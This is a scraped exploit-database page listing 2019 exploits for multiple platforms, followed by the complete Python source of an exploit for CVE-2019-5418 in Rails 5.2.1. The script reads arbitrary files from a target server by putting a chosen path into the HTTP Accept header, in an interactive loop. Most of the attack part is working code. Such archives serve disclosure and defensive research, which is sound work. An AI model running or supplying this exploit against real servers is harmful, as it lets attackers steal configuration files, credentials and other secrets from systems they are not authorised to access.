Menu

Improved exploit search engine. Try it out

"Rails 5.2.1 - Arbitrary File Content Disclosure"

Author

NotoriousRebel

Platform

multiple

Release date

2019-03-21

Release Date Title Type Platform Author
2019-04-19 "Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit)" remote multiple Metasploit
2019-04-18 "LibreOffice < 6.0.7 / 6.1.3 - Macro Code Execution (Metasploit)" local multiple Metasploit
2019-04-18 "Netwide Assembler (NASM) 2.14rc15 - NULL Pointer Dereference (PoC)" dos multiple "Fakhri Zulkifli"
2019-04-17 "Oracle Java Runtime Environment - Heap Corruption During TTF font Rendering in GlyphIterator::setCurrGlyphID" dos multiple "Google Security Research"
2019-04-17 "Oracle Java Runtime Environment - Heap Corruption During TTF font Rendering in sc_FindExtrema4" dos multiple "Google Security Research"
2019-04-09 "Apache Axis 1.4 - Remote Code Execution" remote multiple "David Yesland"
2019-04-08 "QNAP Netatalk < 3.1.12 - Authentication Bypass" remote multiple muts
2019-04-03 "Google Chrome 72.0.3626.96 / 74.0.3702.0 - 'JSPromise::TriggerPromiseReactions' Type Confusion" remote multiple "Google Security Research"
2019-04-03 "Google Chrome 73.0.3683.39 / Chromium 74.0.3712.0 - 'ReadableStream' Internal Object Leak Type Confusion" dos multiple "Google Security Research"
2019-04-03 "Google Chrome 72.0.3626.81 - 'V8TrustedTypePolicyOptions::ToImpl' Type Confusion" dos multiple "Google Security Research"
2019-04-03 "WebKitGTK+ - 'ThreadedCompositor' Race Condition" dos multiple "Google Security Research"
2019-04-03 "WebKit JavaScriptCore - CodeBlock Dangling Watchpoints Use-After-Free" dos multiple "Google Security Research"
2019-04-03 "WebKit JavaScriptCore - Out-Of-Bounds Access in FTL JIT due to LICM Moving Array Access Before the Bounds Check" dos multiple "Google Security Research"
2019-04-03 "iOS < 12.2 / macOS < 10.14.4 XNU - pidversion Increment During execve is Unsafe" dos multiple "Google Security Research"
2019-04-03 "WebKit JavaScriptCore - 'createRegExpMatchesArray' Type Confusion" dos multiple "Google Security Research"
2019-04-03 "SpiderMonkey - IonMonkey Compiled Code Fails to Update Inferred Property Types (Type Confusion)" dos multiple "Google Security Research"
2019-03-28 "Oracle Weblogic Server Deserialization RCE - Raw Object (Metasploit)" remote multiple Metasploit
2019-03-26 "Spidermonkey - IonMonkey Type Inference is Incorrect for Constructors Entered via OSR" dos multiple "Google Security Research"
2019-03-26 "Firefox < 66.0.1 - 'Array.prototype.slice' Buffer Overflow" dos multiple xuechiyaobai
2019-03-25 "Apache CouchDB 2.3.1 - Cross-Site Request Forgery / Cross-Site Scripting" webapps multiple "Ozer Goker"
2019-03-21 "Rails 5.2.1 - Arbitrary File Content Disclosure" webapps multiple NotoriousRebel
2019-03-19 "Google Chrome < M73 - FileSystemOperationRunner Use-After-Free" dos multiple "Google Security Research"
2019-03-19 "Google Chrome < M73 - MidiManagerWin Use-After-Free" dos multiple "Google Security Research"
2019-03-19 "Google Chrome < M73 - Data Race in ExtensionsGuestViewMessageFilter" dos multiple "Google Security Research"
2019-03-19 "Google Chrome < M73 - Double-Destruction Race in StoragePartitionService" dos multiple "Google Security Research"
2019-03-18 "BMC Patrol Agent - Privilege Escalation Code Execution Execution (Metasploit)" remote multiple Metasploit
2019-03-15 "NetData 1.13.0 - HTML Injection" webapps multiple s4vitar
2019-03-14 "Apache UNO / LibreOffice Version: 6.1.2 / OpenOffice 4.1.6 API - Remote Code Execution" remote multiple sud0woodo
2019-03-11 "Liferay CE Portal < 7.1.2 ga3 - Remote Command Execution (Metasploit)" webapps multiple AkkuS
2019-03-08 "OrientDB 3.0.17 GA Community Edition - Cross-Site Request Forgery / Cross-Site Scripting" webapps multiple "Ozer Goker"
Release Date Title Type Platform Author
2019-03-21 "Rails 5.2.1 - Arbitrary File Content Disclosure" webapps multiple NotoriousRebel
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46585/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46585/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46585/41033/rails-521-arbitrary-file-content-disclosure/download/", "exploit_id": "46585", "exploit_description": "\"Rails 5.2.1 - Arbitrary File Content Disclosure\"", "exploit_date": "2019-03-21", "exploit_author": "NotoriousRebel", "exploit_type": "webapps", "exploit_platform": "multiple", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
'''
Exploit Title: File Content Disclosure on Rails
Date: CVE disclosed 3/16 today's date is 3/20
Exploit Author: NotoriousRebel
Vendor Homepage: https://rubyonrails.org/
Software Link: https://github.com/rails/rails
Version: Versions Affected: all Fixed Versions: 6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1
Tested on: Rails 5.2.1 (Using ubuntu on linux subsystem for Windows)
CVE: 2019-5418
'''
import sys

try:
    import requests
except ImportError:
    print('\n\033[93m[!] Requests library not found, please install before proceeding.\n\n \033[0m')
    sys.exit(1)


def banner():
    banner = """
    ----------------------------------------------
    Arbitrary Traversal exploit for Ruby on Rails
    CVE-2019-5418
    ----------------------------------------------
    """
    print(banner)

def check_args():
    if len(sys.argv) != 2:
        print("Invalid number of arguments entered!")
        how_to_use = "python3 Bandit.py url"
        print('Use as:', how_to_use)
        sys.exit(1)


def check_url(url):
    status_code = requests.get(url)
    if status_code != 200:
        print("Url is invalid or can not be reached!")
        sys.exit(1)


def read_file(url, file):
    headers = {'Accept': file + '{{'}
    req = requests.get(url, headers=headers)
    return req


def main():
    banner()
    check_args()
    url = sys.argv[1]
    while True:
        try:
            file = input("Enter file to read (enter quit to exit): ")
        except Exception:
            file = raw_input("Enter file to read (enter quit to exit): ")
        try:
            if file.lower() == 'quit':
                break
        except Exception:
            if file == 'quit':
                break
        response = read_file(url, file)
        print(response.text)


if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        print('\n\n\033[93m[!] ctrl+c detected from user, quitting.\n\n \033[0m')